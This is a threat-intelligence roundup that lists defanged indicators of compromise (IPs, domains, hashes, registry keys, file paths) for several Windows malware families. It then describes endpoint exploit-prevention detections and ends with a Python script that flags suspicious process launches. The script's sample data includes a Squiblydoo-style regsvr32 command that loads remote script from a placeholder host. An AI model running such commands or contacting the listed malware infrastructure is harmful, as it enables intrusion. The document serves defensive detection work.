Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Oct. 15 and Oct. 22. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats are subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found here that includes the complete list of file hashes, as well as all other IOCs from this post. A visual depiction of the MITRE ATT&CK techniques associated with each threat is also shown. In these images, the brightness of the technique indicates how prevalent it is across all threat files where dynamic analysis was conducted. There are five distinct shades that are used, with the darkest indicating that no files exhibited technique behavior and the brightest indicating that technique behavior was observed from 75 percent or more of the files.

The most prevalent threats highlighted in this roundup are:

Threat Name | Type | Description
Win.Dropper.Ramnit-9902254-0 | Dropper | Ramnit is a banking trojan that monitors web browser activity on an infected machine and collects login information from financial websites. It also has the ability to steal browser cookies and attempts to hide from popular antivirus software.
Win.Dropper.Gandcrab-9902378-0 | Dropper | Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB," ".CRAB" or ".KRAB". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
Win.Dropper.Fareit-9902448-1 | Dropper | The Fareit trojan is primarily an information stealer with functionality to download and install other malware.
Win.Dropper.Emotet-9902435-0 | Dropper | Emotet is one of the most widely distributed and active malware families today. It is a highly modular threat that can deliver a wide variety of payloads. Emotet is commonly delivered via Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Dropper.TrickBot-9902436-0 | Dropper | TrickBot is a banking trojan targeting sensitive information for certain financial institutions. This malware is frequently distributed through malicious spam campaigns. Many of these campaigns rely on downloaders for distribution, such as VB scripts.
Win.Trojan.Xpiro-9902727-1 | Trojan | Expiro is a known file infector and information-stealer that hinders analysis with anti-debugging and anti-analysis tricks.
Win.Dropper.ZBot-9902454-1 | Dropper | Zbot, also known as Zeus, is a trojan that steals information, such as banking credentials, using methods such as key-logging and form-grabbing.
Win.Dropper.Remcos-9903276-0 | Dropper | Remcos is a remote access trojan (RAT) that allows attackers to execute commands on the infected host, log keystrokes, interact with a webcam, and capture screenshots. This malware is commonly delivered through Microsoft Office documents with macros, sent as attachments on malicious emails.
Win.Trojan.Tofsee-9903049-1 | Trojan | Tofsee is multi-purpose malware that features a number of modules used to carry out various activities such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator's control.

Threat Breakdown

Win.Dropper.Ramnit-9902254-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 17 samples
Registry Keys | Occurrences
Mutexes | Occurrences
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
Files and/or directories created | Occurrences

*See JSON for more IOCs

File Hashes


Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (figures not reproduced here): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK


Win.Dropper.Gandcrab-9902378-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 23 samples
Registry Keys | Occurrences
Mutexes | Occurrences

*See JSON for more IOCs

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Files and/or directories created | Occurrences

*See JSON for more IOCs

File Hashes

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (figures not reproduced here): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK


Win.Dropper.Fareit-9902448-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 41 samples
Registry Keys | Occurrences
Mutexes | Occurrences
GLOBAL\{<random GUID>} | 1
Local\{<random GUID>} | 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Domain Names contacted by malware (does not indicate maliciousness) | Occurrences

*See JSON for more IOCs

Files and/or directories created | Occurrences

*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (figures not reproduced here): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK


Win.Dropper.Emotet-9902435-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 19 samples
Registry Keys | Occurrences
Mutexes | Occurrences
Global\I98B68E3C | 19
Global\M98B68E3C | 19
MC8D2645C | 19
<random, matching [a-zA-Z0-9]{5,9}> | 19
Global\I669ABD8E | 1
Global\M669ABD8E | 1
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences

File Hashes


Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection (figures not reproduced here): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK


Win.Dropper.TrickBot-9902436-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 25 samples
Registry Keys | Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 | 25
Mutexes | Occurrences

*See JSON for more IOCs

IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
23[.]94[.]233[.]210 | 20
172[.]82[.]152[.]126 | 17
192[.]3[.]104[.]46 | 10
192[.]3[.]247[.]11 | 9
202[.]29[.]215[.]114 | 1
Files and/or directories created | Occurrences

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection (figures not reproduced here): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK


Win.Trojan.Xpiro-9902727-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 300 samples
Registry Keys | Occurrences
Mutexes | Occurrences
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
64[.]70[.]19[.]203 | 1
69[.]16[.]231[.]59 | 1
91[.]203[.]144[.]150 | 1
Domain Names contacted by malware (does not indicate maliciousness) | Occurrences
Files and/or directories created | Occurrences

*See JSON for more IOCs

File Hashes

*See JSON for more IOCs

Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | This has coverage

Screenshots of Detection (figures not reproduced here): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK


Win.Dropper.ZBot-9902454-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 14 samples
Registry Keys | Occurrences
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 | 14
<HKCU>\SOFTWARE\MOVIEMFC | 14
<HKCU>\SOFTWARE\MOVIEMFC\RECENT FILE LIST | 14
<HKCU>\SOFTWARE\MOVIEMFC\SETTINGS | 14
Mutexes | Occurrences
85485515 | 14
IP Addresses contacted by malware (does not indicate maliciousness) | Occurrences
212[.]55[.]90[.]223 | 1
212[.]55[.]89[.]194 | 1
212[.]55[.]65[.]63 | 1
212[.]55[.]73[.]224 | 1
Files and/or directories created | Occurrences
%System32%\Tasks\aybbmte | 14
%ProgramData%\Mozilla\thfirxd.exe | 14

File Hashes


Coverage

Product | Protection
Secure Endpoint | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Secure Malware Analytics | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (figures not reproduced here): Secure Endpoint, Secure Malware Analytics, MITRE ATT&CK


Win.Dropper.Remcos-9903276-0

Indicators of Compromise

  • IOCs collected from dynamic analysis of 15 samples
Registry Keys | Occurrences
Mutexes    Occurrences
Remcos_Mutex_Inj 7
8-3503835SZBFHHZ 2
hjtfjytfcyhnghncghc-O9CPRJ 2
pastananiceforwhat-OMFBDS 2
ggbkgjkijgvfghf-N13E67 2
L50P-7PUFX6AYHMZ 1
S-1-5-21-2580483-90819155372 1
S-1-5-21-2580483-9083183940534 1
80ONCA3AF1DGC91- 1
343P-D-F3U45KF5C 1
76-7BT98W6W18ECA 1
Global\584274e1-301a-11ec-b5f8-00501e3ae7b6 1
Remcos-CIQ6B9 1
47fd345bba97a3052ef471becf32c6d2 1
6528QP5U5H8-5YZz 1
-3747523CC6-w2LZ 1
O094-12BWX2JKxyZ 1
3L8B461U70EZ33HE 1
IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
34[.]102[.]136[.]180 5
162[.]159[.]130[.]233 3
162[.]159[.]129[.]233 3
184[.]168[.]131[.]241 2
23[.]227[.]38[.]74 2
185[.]157[.]162[.]100 2
185[.]157[.]162[.]241 2
5[.]181[.]234[.]145 2
5[.]181[.]234[.]139 2
162[.]159[.]133[.]233 1
162[.]159[.]135[.]233 1
13[.]107[.]42[.]12/31 1
142[.]250[.]65[.]179 1
86[.]105[.]245[.]69 1
34[.]96[.]116[.]138 1
104[.]161[.]81[.]220 1
37[.]120[.]138[.]222 1
13[.]250[.]255[.]10 1
205[.]164[.]63[.]58 1
209[.]133[.]203[.]146 1
192[.]64[.]116[.]180 1
165[.]32[.]109[.]217 1
156[.]235[.]230[.]246 1
197[.]248[.]5[.]16 1
156[.]235[.]157[.]134 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
cdn[.]discordapp[.]com 9
onedrive[.]live[.]com 6
rem1[.]camdvr[.]org 2
freelife[.]hopto[.]org 2
freelife1[.]hopto[.]org 2
remman1[.]ddns[.]net 2
pl2byg[.]bl[.]files[.]1drv[.]com 2
bq9ojq[.]bn[.]files[.]1drv[.]com 2
remman2[.]ddns[.]net 2
www[.]dkku88[.]com 1
hwzpgovt[.]nsupdate[.]info 1
www[.]tempestchs[.]com 1
www[.]hfsd1[.]com 1
www[.]fromgoing[.]com 1
www[.]mexico-datacenter[.]com 1
www[.]epicwoodsale[.]com 1
www[.]46t[.]xyz 1
www[.]cataracte-marseille[.]com 1
www[.]tzkaxh[.]com 1
www[.]eidk-55dken[.]com 1
www[.]votifyme[.]net 1
www[.]cis136-tgarza[.]com 1
www[.]sunnysikka[.]com 1
www[.]jahromi[.]foundation 1
www[.]vpayonlinelk[.]com 1

*See JSON for more IOCs

Files and/or directories created    Occurrences
%APPDATA%\remcos 7
%APPDATA%\remcos\logs.dat 7
%PUBLIC%\nest 3
%PUBLIC%\KDECO.bat 3
%PUBLIC%\Trast.bat 3
%PUBLIC%\UKO.bat 3
%PUBLIC%\nest.bat 3
%PUBLIC%\Libraries\Whdvibd 2
%PUBLIC%\Libraries\Whdvibd\Whdvibd.exe 2
%PUBLIC%\Libraries\dbivdhW.url 2
%PUBLIC%\Libraries\Ylifala 2
%PUBLIC%\Libraries\Ylifala\Ylifala.exe 2
%PUBLIC%\Libraries\alafilY.url 2
%PUBLIC%\Libraries\Hqqxwss 1
%PUBLIC%\Libraries\Hqqxwss\Hqqxwss.exe 1
%PUBLIC%\Libraries\sswxqqH.url 1
%PUBLIC%\Libraries\Owzqggf 1
%PUBLIC%\Libraries\Owzqggf\Owzqggf.exe 1
%PUBLIC%\Libraries\fggqzwO.url 1
%PUBLIC%\Libraries\Gazfkfl 1
%PUBLIC%\Libraries\Gazfkfl\Gazfkfl.exe 1
%PUBLIC%\Libraries\lfkfzaG.url 1
%PUBLIC%\Libraries\Dkymiyh 1
%PUBLIC%\Libraries\Dkymiyh\Dkymiyh.exe 1
%PUBLIC%\Libraries\hyimykD.url 1

*See JSON for more IOCs

File Hashes

0aff281c192e919ce8a4e2091a058aa3c8fab2379dd50d7dd7ac7217af4dc838
4a90c0d95b34f54bd38bdc83e548298373289dae63b93de0eb1d92787d3157bc
6b0adce9ecdf4f6ffa0757c0fefe6a5c5a34eed8d8be31e7fb6edf8bf1c7066f
787d592049f8eed9c9ee846c9067a640e89fa19617b03670a97a913738d337f4
7a4c932a221ca312726ee34cd1650e6d1eac557c63b5c9101bc31a9754125b45
97d7e64fe2b669273c0773559e2e329c341a818dafefc5a965cec7cd8553be8f
a2067e35b12b83ddae55145931870302de477b5ccce82a5e86ea7bf8e057d8d7
a2539269c2b9200d7baed9f0dfc25b59fd4713a641d79fd9bd13272c7e1296ca
a86c13560165038405df594a8047e304210fa069cc990c9dad0470187f488bc2
afbecf94557d0ed854e8b06a3da6e73f901fae83ba200c013e684c777c307da1
b44eb5ef1127b377412280cd01950324c63591f8a9bd754363872cf7d2f3955d
c172f7be213d14c5baf25f44467236abbe45a368996b88178c11dee6a9621720
c23190d9c4b457c457fad80fe8842e47026a4a1efddebcc674ff9477b3cd3942
c60a64f8910005f98f6cd8c5787e4fe8c6580751a43bdbbd6a14af1ef6999b8f
ff846b96e943fe0006577be6b3ed30bfad73a0791457933ab5efb69e83d08ae2

Coverage

Product    Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint


Secure Malware Analytics


MITRE ATT&CK


Win.Trojan.Tofsee-9903049-1

Indicators of Compromise

  • IOCs collected from dynamic analysis of 303 samples
Registry Keys    Occurrences
<HKU>\.DEFAULT\CONTROL PANEL\BUSES
Value Name: Config4
303
<HKU>\.DEFAULT\CONTROL PANEL\BUSES 303
<HKCR>\LOCAL SETTINGS\SOFTWARE\MICROSOFT\WINDOWS\SHELL\BAGS\159 303
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'> 61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Type
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Start
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ErrorControl
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: DisplayName
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: WOW64
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ObjectName
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: Description
61
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\<random, matching '[A-Z0-9]{8}'>
Value Name: ImagePath
26
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC 18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: Type
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: Start
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: ErrorControl
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: DisplayName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: WOW64
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: ObjectName
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\MWYTPHGC
Value Name: Description
18
<HKLM>\SOFTWARE\MICROSOFT\WINDOWS DEFENDER\EXCLUSIONS\PATHS
Value Name: C:\Windows\SysWOW64\mwytphgc
18
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD 17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Type
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: Start
17
<HKLM>\SYSTEM\CONTROLSET001\SERVICES\NXZUQIHD
Value Name: ErrorControl
17
IP Addresses contacted by malware. Does not indicate maliciousness    Occurrences
185[.]7[.]214[.]171 303
185[.]7[.]214[.]210 303
45[.]9[.]20[.]187 303
45[.]9[.]20[.]178/31 303
185[.]7[.]214[.]212/31 303
192[.]0[.]47[.]59 300
144[.]160[.]235[.]143 279
157[.]240[.]229[.]174 263
211[.]231[.]108[.]46/31 260
125[.]209[.]238[.]100 259
142[.]250[.]80[.]100 258
117[.]53[.]116[.]15 249
96[.]114[.]157[.]80 248
103[.]224[.]212[.]34 244
67[.]231[.]149[.]140 235
74[.]208[.]5[.]20/31 235
51[.]81[.]57[.]58/31 220
64[.]98[.]36[.]4 214
216[.]146[.]35[.]35 207
208[.]76[.]51[.]51 188
212[.]77[.]101[.]4 185
62[.]141[.]42[.]208 184
193[.]222[.]135[.]150 182
67[.]231[.]152[.]94 176
67[.]231[.]144[.]94 172

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness    Occurrences
249[.]5[.]55[.]69[.]bl[.]spamcop[.]net 303
249[.]5[.]55[.]69[.]cbl[.]abuseat[.]org 303
249[.]5[.]55[.]69[.]dnsbl[.]sorbs[.]net 303
249[.]5[.]55[.]69[.]in-addr[.]arpa 303
249[.]5[.]55[.]69[.]sbl-xbl[.]spamhaus[.]org 303
249[.]5[.]55[.]69[.]zen[.]spamhaus[.]org 303
microsoft-com[.]mail[.]protection[.]outlook[.]com 303
microsoft[.]com 303
www[.]google[.]com 303
defeatwax[.]ru 303
whois[.]iana[.]org 301
aspmx[.]l[.]google[.]com 301
whois[.]arin[.]net 300
al-ip4-mx-vip1[.]prodigy[.]net 279
mail[.]h-email[.]net 269
www[.]instagram[.]com 263
mx1[.]naver[.]com 260
naver[.]com 260
mxa-000cb501[.]gslb[.]pphosted[.]com 257
ameritrade[.]com 255
mx1[.]hanmail[.]net 255
nate[.]com 250
comcast[.]net 249
mx1[.]comcast[.]net 249
mx1[.]nate[.]com 249

*See JSON for more IOCs

Files and/or directories created    Occurrences
%SystemRoot%\SysWOW64\config\systemprofile 303
%SystemRoot%\SysWOW64\config\systemprofile:.repos 303
%TEMP%\<random, matching '[a-z]{8}'>.exe 287
%SystemRoot%\SysWOW64\<random, matching '[a-z]{8}'> 61
%System32%\config\systemprofile:.repos 32
%System32%\<random, matching '[a-z]{7,8}'>\<random, matching '[a-z]{6,8}'>.exe (copy) 31
%TEMP%\<random, matching '[a-z]{4,9}'>.exe 20
%SystemRoot%\SysWOW64\mwytphgc 18
%SystemRoot%\SysWOW64\nxzuqihd 17
%SystemRoot%\SysWOW64\vfhcyqpl 16
%SystemRoot%\SysWOW64\yikfbtso 16
%SystemRoot%\SysWOW64\kuwrnfea 14
%SystemRoot%\SysWOW64\xhjeasrn 14
%SystemRoot%\SysWOW64\lvxsogfb 14
%SystemRoot%\SysWOW64\fprmiazv 13
%SystemRoot%\SysWOW64\jtvqmedz 13
%SystemRoot%\SysWOW64\gqsnjbaw 13
%SystemRoot%\SysWOW64\rbdyumlh 13
%SystemRoot%\SysWOW64\hrtokcbx 13
%SystemRoot%\SysWOW64\isupldcy 12
%SystemRoot%\SysWOW64\oyavrjie 12
%SystemRoot%\SysWOW64\akmhdvuq 11
%SystemRoot%\SysWOW64\tdfawonj 10
%SystemRoot%\SysWOW64\qacxtlkg 10
%SystemRoot%\SysWOW64\uegbxpok 10

*See JSON for more IOCs

File Hashes

00f242bc44c5248cc25b0d8acee2b061346cc4a5324e5054aa2b55142b0dbee6
011658ddb0669763ac08644873449d34c3f33d2002a0f844792005db0ce5609b
019bf0680df79bffa823f1a3918ea67d7ad10f0cbcc40e1a88d874d02b8d2dc2
02299de4f5af9a9cbad028b4d5764f0371c12109845e57e32c46595366efe539
0495248ec28f2554c2714cca9555f31740bf67e7fc97b3cc5ac1cbd9efe72cb7
04f06f660267078a5a2c7048f404c2bd599de312f6311ae10a76f2020c6badec
0525137a6739f44efd5cac8c4d26ba402f4473f3d1413925ceb0b9e75b0b2b84
060a5186b5b2adc8371b4ce0cebb0e14c5b4e913d7d9e08c6af102c974bc0592
069e7337c8444f925494eb65ffb787b3cc019e5c09611df002a87d2c10e65ce4
06e06de3bf171d6b15a7383d1618df129cf373abd7347214ce44d955eb664e2d
074e7d77e002d485117749e96ea50593d1de3d92d88d55039d0268d8bc41badd
082c3649e8e3c4ff25d5cdad50baafd3520bfd75f06e2ef9a3cbcee3525c490d
089b06dbe61e07ab888375ea270e089f43721ef3a3fc3afb4c35bf8032824195
09073ace4e3cafdeb33a1ea6d792e6e759a2652f2eb71a17116a9850726638ed
09b4d0f1a784921aec9998689e809224f4f188672f232f02b4648aa70cd9fca6
09b8746d2fccfb3b2bfea13590abfd0bc199078465d04b18ff4d0cd3b119c5a4
0beb0fb7155500ac10b732b1ceea7d825cbdf4d786f9abf4949375b358d6f875
0cb5517715dfdf737e64fd70e2cd3ba381cb13cde4884d4b3fdd49917ede6366
0e8d0355f7931e398be43ac49540458001b634beb51f02b37757bf51ee65da57
0f00a2e458640c2a271ae4f6ab1a770ba961de752b51ba6819319a380ac5fc91
0f06cbb5221543def460036b32c7f51e02be78f0bd24203811c2a7e1c5780b02
0f1af419562afec3780872de1d127835022e124da0d0fa465c390703a32478a5
1013f8e04f61bec2cd8c7780e66ddf724cde0124371b78e3c222065a8690dcf0
11506f818ef7327b7c10bf71698bc6315110b06f822788be2f505a4242b475c0
116fb95465708fbc2a897e20181ae61543c8a07df08431940c22605e2752569d

*See JSON for more IOCs

Coverage

Product    Protection
Secure Endpoint This has coverage
Cloudlock N/A
CWS This has coverage
Email Security This has coverage
Network Security This has coverage
Stealthwatch N/A
Stealthwatch Cloud N/A
Secure Malware Analytics This has coverage
Umbrella This has coverage
WSA This has coverage

Screenshots of Detection

Secure Endpoint


Secure Malware Analytics


MITRE ATT&CK


Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.

Process hollowing detected - (32784)
Process hollowing is a technique used by some programs to avoid static analysis. In typical usage, a process is started and its obfuscated or encrypted contents are unpacked into memory. The parent then manually sets up the first stages of launching a child process, but before launching it, the memory is cleared and filled in with the memory from the parent instead.
Crystalbit-Apple DLL double hijack detected - (6323)
Crystalbit-Apple DLL double hijack was detected. During this attack, the adversary abuses two legitimate vendor applications, such as CrystalBit and Apple, as part of a DLL double hijack attack chain that starts with a fraudulent software bundle and eventually leads to a persistent miner and, in some cases, spyware deployment.
Expiro Malware detected - (6068)
Expiro malware is unique in that it infiltrates executable files on both 32- and 64-bit Windows systems by appending its viral code to the host. It can be used to install malicious browser extensions, lower browser security settings, and steal account credentials.
Excessively long PowerShell command detected - (4283)
A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.
A Microsoft Office process has started a windows utility. - (2642)
A process associated with Microsoft Office, such as EXCEL.exe, OUTLOOK.exe or WINWORD.exe, has started a Windows utility such as powershell.exe or cmd.exe. This is typical behavior of malicious documents executing additional scripts. This behavior is extremely suspicious and is associated with many different malware campaigns and families.
CVE-2020-1472 exploit detected - (2308)
An attempt to exploit CVE-2020-1472, also known as "Zerologon", has been detected. This is a privilege escalation vulnerability in Netlogon.
Reverse tcp payload detected - (1743)
An exploit payload intended to connect back to an attacker-controlled host using TCP has been detected.
Dealply adware detected - (1352)
DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. Adware has also been known to download and install malware.
Kovter injection detected - (653)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware, meaning the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the usage of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Squiblydoo application control bypass attempt detected. - (517)
An attempt to bypass application control via the "Squiblydoo" technique has been detected. This typically involves using regsvr32.exe to execute script content hosted on an attacker-controlled server.
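Three of the behaviors described in this section (an Office process starting a Windows utility, an excessively long PowerShell command line, and regsvr32.exe loading script content from a remote URL) can be expressed as simple checks over process-creation telemetry. The following is an added example written for this roundup, not Talos or AMP code: it assumes each event carries a parent image path, an image path and a command line (the fields a Sysmon event 1 or a typical EDR process event exposes), and the length threshold and the sample events are constructed for illustration, since the roundup does not state the threshold AMP uses.

```python
import re

# Process names as they appear in process-creation telemetry; all comparisons
# are done on the lower-cased basename so full paths and casing do not matter.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
WINDOWS_UTILITIES = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                     "mshta.exe", "regsvr32.exe", "rundll32.exe"}

# Assumed threshold (not from the roundup): measure the length distribution of
# benign PowerShell command lines in your environment before settling on one.
LONG_POWERSHELL_THRESHOLD = 1024

URL_RE = re.compile(r"https?://", re.IGNORECASE)


def basename(path: str) -> str:
    """Return the lower-cased file name of a Windows- or POSIX-style path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_event(event: dict) -> list:
    """Return the finding tags that apply to one process-creation event."""
    findings = []
    image = basename(event.get("image", ""))
    parent = basename(event.get("parent_image", ""))
    cmdline = event.get("command_line", "")

    # "A Microsoft Office process has started a windows utility."
    if parent in OFFICE_PARENTS and image in WINDOWS_UTILITIES:
        findings.append("office_spawned_utility")

    # "Excessively long PowerShell command": a long argument list is a weak
    # but cheap indicator of an obfuscated or encoded script.
    if image == "powershell.exe" and len(cmdline) > LONG_POWERSHELL_THRESHOLD:
        findings.append("long_powershell_command")

    # "Squiblydoo": regsvr32.exe pointed at script content on a remote host.
    if image == "regsvr32.exe" and URL_RE.search(cmdline):
        findings.append("regsvr32_remote_script")

    return findings


def scan(events: list) -> list:
    """Run every check over a batch of events; returns (event id, tag) pairs."""
    return [(e["id"], tag) for e in events for tag in check_event(e)]


# Constructed sample events, not real telemetry. Event 1 is a benign document
# open, event 5 a benign scheduled script; 2, 3 and 4 should each trip one rule.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": '"WINWORD.EXE" /n "quarterly-report.docx"'},
    {"id": 2, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c start helper.vbs"},
    {"id": 3, "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command " + "$a=1;" * 300},
    {"id": 4, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": "regsvr32.exe /i:https://example.invalid/update.sct scrobj.dll"},
    {"id": 5, "parent_image": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\scripts\inventory.ps1"},
]

if __name__ == "__main__":
    for event_id, tag in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {tag}")
```

Each rule fires on the event constructed for it and on none of the benign ones, which is the property to keep when tuning: the Office-parent rule is high confidence on its own, while the length rule is best combined with other signals (encoded arguments, unusual parent) before it pages anyone.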